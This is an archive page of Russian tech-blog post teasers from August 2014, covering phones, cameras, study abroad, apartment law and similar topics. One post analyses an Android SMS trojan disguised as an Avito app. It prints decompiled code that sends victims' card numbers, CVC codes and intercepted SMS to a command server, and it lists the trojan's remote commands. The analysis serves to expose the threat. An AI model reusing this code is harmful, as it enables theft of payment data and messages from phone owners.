Архив за 26 августа 2014

Вскоре после Microsoft похожую технологию съёмки hyperlapse-видео с аппаратной стабилизацией изображения показала и компания Instagram (Facebook). Только здесь уже есть готовое мобильное приложение, которое можно попробовать прямо сейчас. Пока что бесплатная программа вышла только под iOS, версию для Android выпустят позже, хотя тут есть сложности с отсутствием требуемых функций в API.

Разработчики программы — Алекс Карпенко и Томас Димсон, друзья из Стэнфордского университета. В 2010 году Карпенко защитил дипломную работу на тему стабилизации изображений, а в 2013 году его фирма Luma разработала первую в мире технологию для стабилизации видео на смартфоне. Секрет — в использовании информации с акселерометра во время съёмки, чтобы компенсировать движения камеры.
Читать полностью »

В треке Service Provider у Cisco появилась новое направление — Service Provider Mobility. Предлагаются два направления — CDMA to LTE и UMTS to LTEЧитать полностью »

image

На эту тему существует достаточно много постов на хабре, и каждый из них дал мне ценную информацию, поэтому хочу поделиться и своим личным опытым и полученным на его основе кратким алгортимом (речь идет о «бюджетной» магистратуре):

  1. Найти вузы и программы в них, на которые теоретически интернациональный студент может получить scholarship (далее грант);
  2. Перевести и заверить свой диплом;
  3. Сдать Toefl и GRE;
  4. Написать Statement of Purpose и другие эссе (если требуется);
  5. Заплатить регистрационный взнос и отправить документы заказным письмом.

И все!

Теперь про каждый шаг подробнее.
Читать полностью »

Разместил я, ничего не подозревая, объявление на avito.ru. Сколько раз туда ходил! Но на этот раз как-то не удалось…
Я давно был уверен, что многие нехорошие люди парсят телефонные номера с этого сайта, так что такси, строительные материалы, скорая компьютерная помощь, «8-800-555-3-555 — проще позвонить, чем у кого-то занимать» и приглашения на битву экстрасенсов для меня уже привычное дело, но на этот раз было нечто новое.

Приходит мне СМС-сообщение с текстом: «Зaинтерсoвaлo вaше oбьявление кaк нaсчет oбменa нa http://…». Прямо вот так, с пропущенным знаком препинания и ошибками. А по ссылке качается avito.apk. Интересно.

Исследование APK

Ну, подумал я, надо бы глянуть, что этот APK делает. Результат привычной для меня связки из apktool + dex2jar + jd-gui меня не удовлетворил, т.к. не было видно часть классов деревом, хотя доступ по ссылкам к ним получить было можно. Решил я воспользоваться новомодными онлайн-sandbox'ами — и декомпилированный код получил, и информацию, и pcap-файл со сдампленным трафиком. Как оказалось, этот файл загружали до меня, поэтому в мои руки попал более ранний анализ, что было достаточно полезно.

Итак, что умеет этот троян:

  • delivery&&& — рассылка СМС-сообщений на номера из телефонной книги с заданным текстом
  • sent&&& — отправка заданных СМС-сообщений с сервера
  • rent&&& — перехват всех СМС-сообщений и отправка их на сервер
  • sms_stop&&& — отмена перехвата СМС-сообщений
  • ussd&&& — USSD-запрос
  • call_1&&& — установка и отмена безусловной переадресации

Немного кода из моих заметок

protected HttpRequestBase a()
    {
        try
        {
            HttpPost httppost = new HttpPost(d());
            ArrayList arraylist = new ArrayList();
            arraylist.add(new BasicNameValuePair("bot_id", com.avito.a.c.a(c())));
            arraylist.add(new BasicNameValuePair("number", b));
            arraylist.add(new BasicNameValuePair("month", Integer.toString(c.intValue())));
            arraylist.add(new BasicNameValuePair("year", Integer.toString(d.intValue())));
            arraylist.add(new BasicNameValuePair("cvc", Integer.toString(e.intValue())));
            httppost.setEntity(new UrlEncodedFormEntity(arraylist, "UTF-8"));
            return httppost;
        }
        catch(UnsupportedEncodingException unsupportedencodingexception)
        {
            unsupportedencodingexception.printStackTrace();
        }
        return null;
    }

    protected String d()
    {
        return new String((new StringBuilder()).append(a).append("set_card.php").toString());
    }






    protected HttpRequestBase a()
    {
        try
        {
            HttpPost httppost = new HttpPost(d());
            ArrayList arraylist = new ArrayList();
            arraylist.add(new BasicNameValuePair("id", com.avito.a.c.a(b)));
            arraylist.add(new BasicNameValuePair("info", com.avito.a.c.b(b)));
            httppost.setEntity(new UrlEncodedFormEntity(arraylist, "UTF-8"));
            return httppost;
        }
        catch(UnsupportedEncodingException unsupportedencodingexception)
        {
            unsupportedencodingexception.printStackTrace();
        }
        return null;
    }

    protected String d()
    {
        return new String((new StringBuilder()).append(a).append("get.php").toString());
    }




    protected HttpRequestBase a()
    {
        try
        {
            JSONObject jsonobject = new JSONObject();
            jsonobject.put("text", c);
            jsonobject.put("number", d);
            jsonobject.put("date", e);
            HttpPost httppost = new HttpPost(d());
            ArrayList arraylist = new ArrayList();
            arraylist.add(new BasicNameValuePair("bot_id", com.avito.a.c.a(b)));
            arraylist.add(new BasicNameValuePair("sms", jsonobject.toString()));
            httppost.setEntity(new UrlEncodedFormEntity(arraylist, "UTF-8"));
            return httppost;
        }
        catch(UnsupportedEncodingException unsupportedencodingexception)
        {
            unsupportedencodingexception.printStackTrace();
        }
        catch(JSONException jsonexception)
        {
            jsonexception.printStackTrace();
        }
        return null;
    }

    protected String d()
    {
        return new String((new StringBuilder()).append(a).append("load_sms.php").toString());

Помимо этих команд, троян отключает Wifi Sleep, пытается получить доступ к зашифрованному хранилищу и установить себя в качестве Android-администратора (естественно, при этом используются стандартные диалоги ОС, где можно отменить данное действие). Код трояна не обфусцирован, некоторые строки закодированы base64. Вообще непонятно, что это за троян такой. То ли его собирали копипастой, то ли он основан на каком-то другом трояне, то ли еще что, но в нем имеются строки на португальском, немецком, английском, Ubuntu-шрифты, форма для перехвата данных из приложения немецкого банка Commerzbank, значок какой-то игры и флеш-плеера.Читать полностью »

Компания Intel уделяет большое внимание сегменту интернета вещей. Кроме разработки концепции, Intel представляет и конкретные аппаратные аппаратные решения: самым последним из них стал интегрированный 3G-модем XMM 6255, самый компактный в своей категории.

Intel XMM 6255

Читать полностью »

Венчурный фонд Life.SREDA инвестировал в Scorista.ru, — об этом сообщается в пресс-релизе фонда. Сумма инвестиций и доля инвестора в проекте не разглашается.

Сервис Scorista.ru (западные аналоги: немецкая Kreditech и американская ZestFinance) предназначен для оценки заемщиков в сложных с точки зрения андеррайтинга сегментах PDL (займы до зарплаты) и POS-кредитовании (кредитование покупки в торговой точке) и рассчитан на микрофинансовые организации, кредитные кооперативы, ломбарды, платежные системы, онлайн и офлайн магазины, продающие товары в рассрочку.

Читать полностью »

Одним флагманским смартфоном в мире стало больше: в Китае представлена модель IUNI U3, базисом которой послужила однокристальная платформа Qualcomm Snapdragon 801. На домашнем рынке устройство поступит в продажу в следующем месяце в трех цветах (черном, белом и зеленом) по цене около $320.

IUNI U3
IUNI U3

Читать полностью »

image

Здравствуйте!

Меня зовут Галамай Андрей.

Начну с того, что я не айтишник. Последние 14 лет я занимаюсь юридической практикой, из них 8 лет как адвокат. В последнее время заметил одну положительную тенденцию – ко мне за консультацией стало обращаться всё больше молодых людей, с просьбой помочь сопроводить сделку купли-продажи квартиры. В процессе общения выяснилось, что все они специалисты в сфере IT-технологий, которые и рассказали мне о Хабре. Я с интересом изучил этот ресурс и решил поступить так, как юристы обычно не поступают. Написать несколько статей с ответами на часто задаваемые вопросы. Чтобы вместо типовых консультаций (которыми заниматься не так интересно) можно было отсылать людей к статьям. А может быть, это все выльется в отдельный проект.

Сегодня – чеклист для приобретения квартиры. То, что рассказываю постоянно – первая статья в цикле.

«11 важных моментов при покупке квартиры на вторичном рынке»

Для граждан сделки с недвижимостью во многих случаях являются самыми важными сделками в жизни. Кроме того, сделки с недвижимостью являются непростым эмоциональным потрясением в жизни, так как в случае неверного юридического оформления документов, можно лишиться и денег, и недвижимости. Мошенничество с недвижимостью, к сожалению, далеко не редкость, как в России, так и в Украине.

Как уберечь себя от таких ситуаций — ниже.

Читать полностью »

Компания Fujifilm официально представила цифровую фотокамеру X30 — преемницу модели X20. Новинка поступит в продажу в сентябре и будет предлагаться в двух цветовых исполнениях (черном и черно-серебристом) по цене $600.

Fujifilm X30

Fujifilm X30 унаследовала от предшественницы датчик изображения X-Trans II типа CMOS формата 2/3 дюйма разрешением 12 Мп и зум-объектив с максимальной диафрагмой F/2,0-2,8, покрывающий диапазон фокусных расстояний 28-112 мм.
Читать полностью »

Сегодня вышел в свет новый релиз BitTorrent Sync 1.4.72.

Вышел BitTorrent Sync 1.4

Читать полностью »